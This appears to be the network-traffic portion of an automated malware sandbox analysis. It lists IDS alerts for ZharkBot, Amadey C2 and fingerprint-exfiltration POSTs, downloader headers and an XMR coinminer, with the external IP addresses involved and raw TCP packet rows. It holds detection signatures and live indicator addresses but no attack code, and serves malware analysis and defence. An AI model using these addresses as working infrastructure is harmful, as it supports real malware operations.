2024-08-31T22:44:57.366217+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50077	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:35.598039+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50041	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:38.288791+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49821	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:17.705270+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49763	80	192.168.2.4	185.215.113.19
2024-08-31T22:43:29.405177+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49911	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:52.102813+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49955	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:58.873335+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49970	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:33.362514+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49918	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:18.451951+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49889	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:27.857813+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49786	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:33.729408+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49804	80	192.168.2.4	185.215.113.19
2024-08-31T22:42:23.854833+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49780	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:23.854833+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49780	80	192.168.2.4	185.216.214.225
2024-08-31T22:43:53.355284+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49959	443	192.168.2.4	188.114.96.3
2024-08-31T22:46:01.325211+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50194	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:17.003141+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50007	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:24.582408+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50124	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:58.899042+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50080	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:21.886612+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49773	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:07.243035+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49745	80	192.168.2.4	185.215.113.19
2024-08-31T22:45:00.528171+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50082	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:37.793637+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49926	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:22.223268+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50017	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:02.121235+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49739	80	192.168.2.4	185.215.113.19
2024-08-31T22:42:39.112866+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49824	80	192.168.2.4	185.215.113.19
2024-08-31T22:43:41.593802+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49933	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:53.220271+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49841	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:53.220271+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49841	443	192.168.2.4	188.114.96.3
2024-08-31T22:41:49.900099+0200	TCP	2826930	ETPRO COINMINER XMR CoinMiner Usage	2	49835	3333	192.168.2.4	161.35.34.195
2024-08-31T22:42:59.979216+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49854	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:39.057002+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50046	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:15.846651+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49884	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:12.004227+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49877	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:46.402378+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50060	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:08.508635+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50098	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:09.238612+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49992	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:36.657878+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50043	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:58.667726+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49852	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:27.918729+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49908	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:12.315719+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49753	80	192.168.2.4	185.215.113.16
2024-08-31T22:45:59.700684+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50193	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:41.444624+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50157	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:48.853240+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50064	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:31.611015+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49795	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:31.611015+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49795	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:37.981377+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49818	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:19.695018+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50116	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:06.540963+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49986	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:27.609753+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49785	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:34.430663+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49805	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:34.430663+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49805	80	192.168.2.4	185.216.214.225
2024-08-31T22:43:26.557627+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49905	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:50.018008+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50067	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:04.005225+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49862	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:23.917613+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49900	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:21.391402+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49774	80	192.168.2.4	185.215.113.19
2024-08-31T22:45:07.309285+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50096	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:40.203684+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49931	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:36.329469+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49813	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:32.163025+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49916	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:09.307105+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49749	80	192.168.2.4	185.215.113.19
2024-08-31T22:44:24.728186+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50021	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:33.278473+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50037	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:13.173250+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49999	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:36.442959+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49923	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:30.995956+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50031	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:20.881414+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50118	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:19.639376+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49770	80	192.168.2.4	185.215.113.19
2024-08-31T22:44:25.940791+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50023	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:04.854755+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50091	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:13.367531+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49879	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:35.864938+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49810	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:01.355179+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49857	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:54.733127+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49961	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:20.760459+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50014	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:54.613418+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50184	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:11.098365+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49751	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:11.098365+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49751	80	192.168.2.4	185.216.214.225
2024-08-31T22:43:39.134346+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49928	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:02.414836+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50085	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:06.578639+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49867	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:37.855787+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50044	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:58.478523+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50191	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:51.236828+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50068	443	192.168.2.4	188.114.96.3
2024-08-31T22:41:58.177817+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	49733	80	192.168.2.4	185.215.113.19
2024-08-31T22:45:46.940077+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50166	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:40.282828+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50155	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:52.260534+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50178	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:33.466766+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50141	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:22.484123+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49897	443	192.168.2.4	188.114.96.3
2024-08-31T22:46:02.548766+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50196	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:04.843229+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49742	80	192.168.2.4	185.215.113.19
2024-08-31T22:45:14.077972+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50106	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:31.483655+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49798	80	192.168.2.4	185.215.113.19
2024-08-31T22:42:02.960155+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49741	80	192.168.2.4	185.215.113.16
2024-08-31T22:45:10.662884+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50100	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:27.140709+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50025	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:48.111939+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50169	443	192.168.2.4	188.114.96.3
2024-08-31T22:41:59.590183+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49736	80	192.168.2.4	185.215.113.19
2024-08-31T22:43:44.228573+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49940	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:18.483994+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50113	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:02.804905+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49859	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:01.133264+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49976	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:23.227594+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49777	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:23.227594+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49777	80	192.168.2.4	185.216.214.225
2024-08-31T22:45:45.779554+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50164	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:47.746291+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50062	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:05.320279+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49864	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:05.452186+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49743	80	192.168.2.4	185.215.113.19
2024-08-31T22:44:11.800167+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49997	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:32.090475+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50035	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:19.448571+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50011	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:23.335067+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49778	80	192.168.2.4	185.215.113.19
2024-08-31T22:45:37.923231+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50149	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:59.938568+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49973	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:56.067835+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49847	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:50.933605+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49953	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:56.211779+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50075	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:11.978440+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50103	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:07.104723+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49744	443	192.168.2.4	104.21.21.16
2024-08-31T22:44:14.345876+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50003	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:05.326288+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49983	443	192.168.2.4	188.114.96.3
2024-08-31T22:41:59.601142+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49735	443	192.168.2.4	172.67.143.156
2024-08-31T22:45:34.691159+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50144	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:08.174165+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49869	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:15.706986+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49762	80	192.168.2.4	185.215.113.19
2024-08-31T22:45:16.679258+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50111	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:31.630686+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49796	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:31.630686+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49796	80	192.168.2.4	185.216.214.225
2024-08-31T22:44:07.887534+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49989	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:35.799944+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50147	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:25.777964+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50126	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:39.089458+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50151	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:13.219623+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49754	80	192.168.2.4	185.215.113.19
2024-08-31T22:42:57.426415+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49850	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:30.692084+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49792	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:30.761931+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50136	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:17.691010+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49765	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:17.691010+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49765	80	192.168.2.4	185.216.214.225
2024-08-31T22:45:23.307513+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50122	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:44.911065+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49830	80	192.168.2.4	185.215.113.19
2024-08-31T22:42:30.703441+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49793	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:44.088234+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50055	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:15.714539+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49757	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:45.455821+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49942	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:15.575729+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50005	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:21.204157+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49894	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:09.675761+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49872	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:53.452956+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50180	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:15.762423+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49758	80	192.168.2.4	185.215.113.19
2024-08-31T22:43:57.455408+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49967	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:57.037365+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50188	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:43.105102+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50159	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:15.411839+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50108	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:54.585505+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49844	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:17.127814+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49886	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:06.094651+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50094	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:34.416672+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49800	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:25.141764+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49903	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:53.545916+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50070	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:10.460520+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49994	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:49.716176+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50171	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:33.458067+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49799	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:34.335942+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50039	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:19.818891+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49892	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:25.664505+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49782	80	192.168.2.4	185.215.113.19
2024-08-31T22:44:54.872416+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50073	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:21.742570+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49772	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:21.742570+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49772	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:49.710044+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49950	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:24.514695+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49781	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:24.514695+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49781	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:24.728204+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49777	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:24.728204+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49777	80	192.168.2.4	185.216.214.225
2024-08-31T22:45:27.075547+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50129	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:42.800839+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49937	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:10.855944+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49874	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:32.374343+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50138	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:28.462132+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50027	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:48.289241+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49948	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:23.175837+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49776	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:23.175837+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49776	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:29.747615+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49794	80	192.168.2.4	185.215.113.19
2024-08-31T22:43:47.082115+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49944	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:02.520854+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49978	443	192.168.2.4	188.114.96.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2024 22:41:57.316385031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.316634893 CEST	49733	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.321491957 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.321536064 CEST	80	49733	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.321553946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.321584940 CEST	49733	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.339180946 CEST	49733	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.344008923 CEST	80	49733	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.348808050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348808050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348808050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348808050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348808050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348808050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348809004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348809004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348829985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348829985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348829985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348829985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348829985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348829985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348829985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348829985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348843098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348843098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348843098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348843098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348843098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348843098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348843098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348843098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348855972 CEST	49732	80	192.168.2.4	185.215.113.19
